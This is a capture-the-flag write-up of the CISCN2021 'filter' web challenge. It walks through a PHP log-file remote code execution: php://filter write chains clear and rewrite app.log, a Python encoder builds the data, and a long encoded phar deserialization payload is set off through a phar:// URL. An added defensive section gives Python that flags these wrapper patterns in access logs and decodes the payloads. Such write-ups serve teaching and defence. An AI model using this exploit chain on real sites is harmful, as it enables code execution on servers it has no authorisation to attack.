CISCN2021 zero-solve challenge (filter)
0x01 First look at the challenge
The challenge is easy to reproduce locally: just extract the zip archive.
Debug mode can be turned off here: web\index.php
First open the zip file; this needs no further explanation.
There is also a hint.
Thinking a bit further, it also involves a log file, so it must be related to that Laravel RCE vulnerability. I won't go into it here; if you are interested, have a look at:
The lar challenge from VNCTF2021: https://blog.csdn.net/anwen12/article/details/115127075 (this one is quite detailed)
Original CVE analysis: https://xz.aliyun.com/t/9165?page=1
From there we borrow a few commonly used encoding combinations to get past the obstacles.
0x02 Reproducing the challenge
Thanks to ma for the ready-made chain, which I used directly: https://ma4ter.cn/2573.html
Preparation before the contest
Clear the log file
http://filter.com/index.php?r=site/index&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
Generate the payload from the chain
How the payload is obtained:
from binascii import b2a_hex

payload = ""  # base64 string produced by the chain; left empty in the original write-up
armedPayload = ''
for ch in payload:
    # each character becomes its quoted-printable hex form ("=XX") followed by "=00",
    # i.e. the quoted-printable encoding of the character's UTF-16LE bytes
    armedPayload += "=" + b2a_hex(ch.encode('utf-8')).decode('utf-8').upper() + "=00"
# the 15-character prefix is the offset mentioned later in the write-up
print("123456789012345" + armedPayload)
payload
Send an even-length filename
http://filter.com/index.php?r=site/index&file=AA
Note that the payload here, during transmission, will go past the line
http://filter.com/index.php?r=site/index&file=123456789012345=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=45=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=74=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=79=00=4D=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4A=00=68=00=64=00=47=00=4E=00=6F=00=55=00=58=00=56=00=6C=00=63=00=6E=00=6C=00=53=00=5A=00=58=00=4E=00=31=00=62=00=48=00=51=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=59=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=5A=00=47=00=4A=00=63=00=51=00=6D=00=46=00=30=00=59=00=32=00=68=00=52=00=64=00=57=00=56=00=79=00=65=00=56=00=4A=00=6C=00=63=00=33=00=56=00=73=00=64=00=41=00=42=00=66=00=5A=00=47=00=46=00=30=00=59=00=56=00=4A=00=6C=00=59=00=57=00=52=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=78=00=4E=00=7A=00=6F=00=69=00=65=00=57=00=6C=00=70=00=58=00=47=00=52=00=69=00=58=00=45=00=4E=00=76=00=62=00=6D=00=35=00=6C=00=59=00=33=00=52=00=70=00=62=00=32=00=34=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=7A=00=6F=00=69=00=63=00=47=00=52=00=76=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=7A=00=4F=00=69=00=4A=00=6B=00=63=00=32=00=34=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=59=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6B=00=59=00=6C=00=78=00=44=00=62=00=32=00=78=00=31=00=62=00=57=00=35=00=54=00=59=00=32=00=68=00=6C=00=62=00=57=00=46=00=43=00=64=00=57=00=6C=00=73=00=5A=00=47=00=56=00=79=00=49=00=6A=00=6F=00=79=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=52=00=35=00=63=00=47=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=65=00=43=00=49=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=54=00=6F=00=69=00=59=00=32=00=46=00=30=00=5A=00=57=00=64=00=76=00=63=00=6E=00=6C=00=4E=00=59=00=58=00=41=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=49=00=36=00=49=00=6E=00=6C=00=70=00=61=00=56=00=78=00=6A=00=59=00=57=00=4E=00=6F=00=61=00=57=00=35=00=6E=00=58=00=45=00=46=00=79=00=63=00=6D=00=46=00=35=00=51=00=32=00=46=00=6A=00=61=00=47=00=55=00=69=00=4F=00=6A=00=49=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6E=00=4E=00=6C=00=63=00=6D=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4D=00=7A=00=41=00=36=00=49=00=67=00=42=00=35=00=61=00=57=00=6C=00=63=00=59=00=32=00=46=00=6A=00=61=00=47=00=6C=00=75=00=5A=00=31=00=78=00=42=00=63=00=6E=00=4A=00=68=00=65=00=55=00=4E=00=68=00=59=00=32=00=68=00=6C=00=41=00=46=00=39=00=6A=00=59=00=57=00=4E=00=6F=00=5A=00=53=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6E=00=67=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=6F=00=69=00=4D=00=53=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=32=00=6B=00=36=00=4D=00=44=00=74=00=39=00=66=00=58=00=31=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=74=00=59=00=61=00=6D=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4C=00=52=00=55=00=35=00=6E=00=6D=00=63=00=4E=00=77=00=34=00=66=00=63=00=6D=00=52=00=77=00=38=00=6B=00=42=00=70=00=51=00=63=00=4E=00=31=00=57=00=61=00=71=00=34=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00=0A=00
Trigger
http://filter.com/index.php?r=site/index&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log
Trigger the phar
http://filter.com/index.php?r=site/index&file=phar://../runtime/logs/app.log/1.txt
The log was cleared successfully.
If it didn't work, just try again.
Send an even-length filename
Send the payload
Triggered perfectly
Command execution complete
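Seen from the defender's side, every step above goes through the same file= parameter, and the wrapper prefixes involved (php://filter with write=, phar://, convert.iconv chains, ../ traversal) are easy to pick out of an access log. The Python below is an added example, not part of the original write-up or of the challenge's code: it scans constructed access-log lines for those patterns and reverses the quoted-printable / UTF-16LE / base64 chain used above, so a responder can see what a logged request tried to write. The log lines, hosts and timestamps are made up, and the rule names and the handling of the 15-character offset prefix are my assumptions.

```python
import base64
import quopri
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (hosts, timestamps and sizes are made up);
# the request targets follow the shapes used in the write-up above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2021:10:00:01 +0800] "GET /index.php?r=site/index&file=AA HTTP/1.1" 200 512
10.0.0.5 - - [01/Jun/2021:10:00:02 +0800] "GET /index.php?r=site/index&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log HTTP/1.1" 200 12
10.0.0.5 - - [01/Jun/2021:10:00:03 +0800] "GET /index.php?r=site/index&file=phar://../runtime/logs/app.log/1.txt HTTP/1.1" 500 0
10.0.0.9 - - [01/Jun/2021:10:00:04 +0800] "GET /index.php?r=site/index&file=about.txt HTTP/1.1" 200 2048
"""

# Pulls the request target out of a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

# Detection rules (names are my own): (name, predicate over one decoded parameter value).
RULES = [
    ("php-filter-write", lambda v: v.lower().startswith("php://filter") and "write=" in v.lower()),
    ("php-filter-read", lambda v: v.lower().startswith("php://filter") and "write=" not in v.lower()),
    ("phar-wrapper", lambda v: v.lower().startswith("phar://")),
    ("iconv-chain", lambda v: "convert.iconv." in v.lower()),
    ("path-traversal", lambda v: "../" in v or "..\\" in v),
]


def classify_value(value: str) -> list:
    """Names of every rule that a single parameter value matches."""
    return [name for name, pred in RULES if pred(value)]


def scan_request_target(target: str) -> dict:
    """Map each query parameter of a request target to the rules it triggers."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings = {}
    for name, values in params.items():
        hits = sorted({rule for v in values for rule in classify_value(v)})
        if hits:
            findings[name] = hits
    return findings


def scan_access_log(text: str) -> list:
    """(line number, findings) for every log line carrying a suspicious parameter."""
    results = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m:
            findings = scan_request_target(m.group("target"))
            if findings:
                results.append((lineno, findings))
    return results


# One "=XX=00" pair per character: quoted-printable encoding of UTF-16LE text.
QP_UTF16_RUN = re.compile(r"(?:=[0-9A-Fa-f]{2}=00)+")


def decode_filter_chain_payload(value: str) -> Optional[bytes]:
    """Reverse the write chain from the write-up for incident analysis:
    quoted-printable-decode -> UTF-16LE -> base64-decode.
    Any leading offset prefix (such as the 15 digits in the write-up) is skipped
    by locating the first run of "=XX=00" pairs. Returns None if nothing decodes."""
    m = QP_UTF16_RUN.search(value)
    if not m:
        return None
    raw = quopri.decodestring(m.group(0).encode("ascii"))
    try:
        return base64.b64decode(raw.decode("utf-16-le"))
    except (UnicodeDecodeError, ValueError):
        return None


if __name__ == "__main__":
    for lineno, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {findings}")
    # Constructed sample: the write-up's encoder applied to base64("hello"), with the offset prefix.
    print(decode_filter_chain_payload("123456789012345=61=00=47=00=56=00=73=00=62=00=47=00=38=00=3D=00"))
```

Run it on a real access log by passing the file's text to scan_access_log; the lines that clear the log (php-filter-write plus iconv-chain plus path-traversal) and the phar:// trigger stand out, while ordinary requests such as file=AA or file=about.txt produce no findings. Feeding a flagged file= value into decode_filter_chain_payload recovers the bytes the request would have written, which is what you want to preserve as evidence rather than the raw request.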
0x03 Complaints about the challenge
This challenge was worth 900 points and the deadline was so brutal that I just didn't do it (there was only an hour left, sob).
But the challenge really isn't hard, nowhere near the skill of our great hacker Guoke.
The offset and the even-length filename in the middle are both covered in that CVE write-up, so it really isn't hard in itself; doing half and submitting half at the time was really lousy of me.
See you all at HIT (Harbin Institute of Technology).